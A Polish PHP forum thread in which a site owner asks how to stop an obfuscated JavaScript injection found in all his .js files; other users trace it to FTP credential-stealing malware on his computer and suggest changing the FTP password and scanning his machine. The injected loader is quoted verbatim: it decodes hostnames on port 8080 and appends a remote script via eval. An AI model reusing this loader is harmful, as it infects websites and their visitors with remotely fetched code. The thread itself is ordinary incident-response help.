Forum PHP.pl

mam na serwisie problem takiego typu ze jakis robal zainfekowal mi wszystkie pliki *.js takim oto skryptem:

(skrypt jest w pisany w JS ale uzyje tagow PHP)

[PHP] pobierz, plaintext 
try{window.onload=function(){Wm64z4i5012 = '' + 'r(#)^$o#@#t)&)t^^e&n$&t(&^o($m^&&a^$)t&(^o&&e)&s)@-&^c&(@o@@#m)!.#))n(a($)s#(z!#a)(#-@(k(@&l^&a)&!s^!!a^@^#.((@p^^l)).$t#&^w)!!$i^t(&($p)!^i!c@(-&@c@^^&o)$m$&#!.($!a^$(!v($(@#a@t!t^)o^#@p#^.&&r)$)^u@^@:^&&@O$!@@1(!$o#$w$&i($!5)@&#k!2@#1!(t&l$^t#^)&d#^(/#!&t@)(#a)$o!&!b(#(a^o##.@)c#@o!^m&&@/&t!)a@$o#@b@^$a)^o&.@@c^o!!$#m(!$/)^^e@s$^)p)$$n(($#.@)$g()o$$@.&!#c&@)(o@@&m&&/&@^!g^@o$@@o&g#$#&l)&#^e@.&c$)@o&&m^/^&c(u(s(#($t#^h#!&^e(&&&#l&$#p!(@.&&(c!o$!!$#m(#!/&!^'.replace(/&|\$|#|@|\)|\^|\!|\(/ig, '') ;Gh26neb7fw7o = 'appendChild';Mbgekw2bjzkxl = document.createElement('sc'+'ript');Mbgekw2bjzkxl.src = 'h'+'ttp://'+Wm64z4i5012.replace(/O1owi5k21tltd/g, '8080');Mbgekw2bjzkxl.setAttribute('defer', 'def'+'er');eval('document.body.'+Gh26neb7fw7o+'(Mbgekw2bjzkxl)');} }  catch(Re5szn1jy ) {}
[PHP] pobierz, plaintext 

moje pytanie jest takie, w jaki sposob zablokowac wykonywanie tego skryptu innym skryptem na stronie, bo nie jestem w stanie usunac z kazdego pliku *.js tego wpisu ze wzgledu na ilosc plikow *.js

z gory dzieki

Ja bym otworzył te pliki w php i dokładnie ten tekst podmienił na "nic" (IMG:style_emoticons/default/haha.gif)

chodzi o to ze jak dojdzie do uruchomienia jakiegos pliku *.js np odpalam edytora WYSIWYG ktory ma zylion plikow *.js to automatycznie do kazdego pliku index*.php dodaje skrypt... tylko kurna nie moge teraz znalezc pliku w ktorym zapisalem tresc tego skryptu...

hm.. zastanawiam sie nad skryptem w php ktory byl by w glownym pliku index.php ktory blokowal by wykonywanie tej funkcji.. tylko nie moge wymyslic jak skonstruowac ten skrypt ...

Pewnie korzystasz z total commandera, i wirus dopisuje kody poprzez ftp (bo w końcu zapamiętałeś hasło). Mam rację?

... (IMG:style_emoticons/default/wstydnis.gif) masz racje... czyli co... wirus siedzi u mnie i kiedy chce to sobie dopisuje?

Tak, zacznij od zmienienia hasła do ftp. Potem przeskanuj kompa, i zainstaluj np. filezille. I nie zapamiętuj hasła w takich programach.

Potem pousuwasz skutki działania wirusa.

ehh... dzieki za porady

skutkow dzialania wirusa juz nie bede usuwal bo pracuje nad nowa wersja aplikacji dla tego serwisu... aktualna nie jest mojego autorstwa i jest tak dziwnie skonstruowana ze gdy chcesz przejsc do jakiejs podstrony za pomoca linku to przekierowuje cie do niej za pomoca adresu np: www.jakasstrona.pl/podstrona ... ale takiego folderu na serwerze nie ma.. jak mniej wiecej zagladalem w kod zrodlowy to ogolnie wszystko jest zczytywane z bazy danych tylko nie wiem na jakiej zasadzie... po prostu jeden wielki hardcore..

a dzisejsza nauke napewno zapamietam na przyszlosc.. jeszcze raz dzieki

Fraza dla google: .htaccess